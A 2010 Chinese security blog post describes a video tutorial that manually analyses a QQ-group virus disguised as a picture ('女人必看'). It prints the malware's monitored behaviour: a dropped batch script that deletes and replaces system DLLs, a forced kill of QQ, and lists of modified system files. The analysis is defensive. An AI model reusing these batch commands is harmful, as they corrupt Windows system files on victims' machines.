注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

QQ吻 手工分析 QQ群共享里的 女人必看 病毒 教程  

2010-08-07 02:26:09|  分类: 原创动画 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

QQ吻 手工分析 QQ群共享里的 女人必看 病毒 教程

“女人必看”成“宅男”杀手 黑客借QQ群共享传毒

金山 从8月1号起 到5号 已经监测到病毒上传达10W次

Author: QQ吻   blog: http://hi.baidu.com/qhack8

用到工具 K8木马病毒后门监视器 结合SSM   K8群共享里有下

教程119M   压缩后3.83M 方便大家下载   解压出来就是119M

下图是该病毒部分监视到的过程 SSM没有阻止到的 K8监视器 监视到了

QQ吻 手工分析 QQ群共享里的 女人必看 病毒 教程 - QQ黑客吧 - Crack8_编程小组 QQ吻

我们来运行他分析一下吧 这个最新几天出来的 女人必看 病毒 看它到低都干了什么


刚才我们都看到了 8月4号 我在某群里下到的 压缩包一打开 仔细一看就看到不是图片

而是scr 看到了吗 SCR 和EXE 的区别看到了吗 后缀不一样 性质 图标可以自己改成

图片的 好了 这是我们 对表面的分析 等监视后 在仔细看看 这个教程是在虚拟机里录制的

rundll32.exe C:\WINDOWS\system32\shimgvw.dll,ImageView_Fullscreen C:\WINDOWS\dfgdfgg.jpg

这一句 调用系统的XXX 来打开图片 一看就看到了


父级进程:
   路径: C:\WINDOWS\sdsf55whg.scr 病毒母体
   PID: 1496
子级进程:
   路径: C:\WINDOWS\explorer.exe
   信息: Windows Explorer (Microsoft Corporation)
   命令行:"C:\WINDOWS\explorer.exe" C:\hellboy.bat 病毒释放出hellboy.bat

move c:\dd.bat c:\dd.bat   
move c:\dd.bat c:\dd.bat
move c:\dd.bat c:\dd.bat
del C:\WINDOWS\system32\dllcache\comres.dll
move C:\WINDOWS\system32\comres.dll C:\WINDOWS\hexil.dll
move C:\WINDOWS\rxing.bat C:\WINDOWS\system32\comres.dll
copy C:\WINDOWS\hexil.dll c:\dd.bat
copy C:\WINDOWS\hexil.dll c:\dd.bat
copy C:\WINDOWS\hexil.dll c:\dd.bat
del %0

IEXPLORE.EXE http://www.baidu.com/

cmd.exe /c "C:\WINDOWS\mssoft.bat "

taskkill.exe /f /im qq.exe /t

这一句 压根就不检测 QQ进程是否存在 就关闭 显然这作者

的编程水平还不怎样 在病毒方面 跟我差远了 各种方式 手断不。。。。

sdsf55whg.scr 明显属于跟图片捆绑的

[创建] C:\WINDOWS\dfgdfgg.jpg

[创建] C:\WINDOWS\sdsf55whg.scr

[修改] C:\WINDOWS\JoachimPeiper.dat
[创建] C:\WINDOWS\rxing.bat SSM没有阻止的 没关系 K8监视器能监视到

[创建] C:\hellboy.bmp

[修改] C:\WINDOWS\system32\CatRoot2\tmp.edb 有点像易语言的数据库

但不懂是不是 想知道 得分析文件

[修改] C:\WINDOWS\system32\inetcpl.cpl
[修改] C:\WINDOWS\system32\inetcpl.cpl

修改] C:\WINDOWS\system32\shell32.dll
[修改] C:\WINDOWS\regedit.exe
[修改] C:\WINDOWS\NOTEPAD.EXE
[修改] C:\WINDOWS\system32\mstask.dll
[修改] C:\WINDOWS\system32\mstask.dll
[修改] D:\K8screen\1.tmp
[修改] C:\WINDOWS\NOTEPAD.EXE
[修改] C:\WINDOWS\MxUninst.exe
[修改] C:\WINDOWS\hh.exe
[修改] C:\WINDOWS\hh.exe
[修改] D:\K8screen\1.tmp
[修改] C:\WINDOWS\explorer.exe
[修改] D:\K8screen\1.tmp
[修改] C:\WINDOWS\explorer.exe
[修改] C:\WINDOWS\system32\pifmgr.dll
[修改] D:\K8screen\1.tmp
[修改] C:\Documents and Settings\Administrator\ntuser.dat.LOG
[修改] C:\Documents and Settings\Administrator\ntuser.dat.LOG
[修改] C:\Documents and Settings\Administrator\ntuser.dat.LOG
[修改] D:\K8screen\1.tmp
[修改] C:\Documents and Settings\Administrator\ntuser.dat.LOG
[修改] C:\WINDOWS\system32\config\software.LOG
[修改] C:\WINDOWS\system32\config\so

[修改] D:\K8screen\1.tmp 这个是录像专家的 呵呵 录这教程的

由于键盘坏了 分析到这里已经够多了 已经能证明这是个病毒了

还有有的人说不会用K8监视器 所以顺便做了个教程

想继续深入研究 自己找病毒样本 教程就到这了 再录下去 教程就大了

刚才监视的时候 忘了暂停了

教程下载地址 K8各群共享 QQ吻各网盘

http://u.115.com/file/f78fd295cc  

手工分析_QQ群共享里的_女人必看_病毒_教程.rar

  评论这张
 
阅读(1894)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016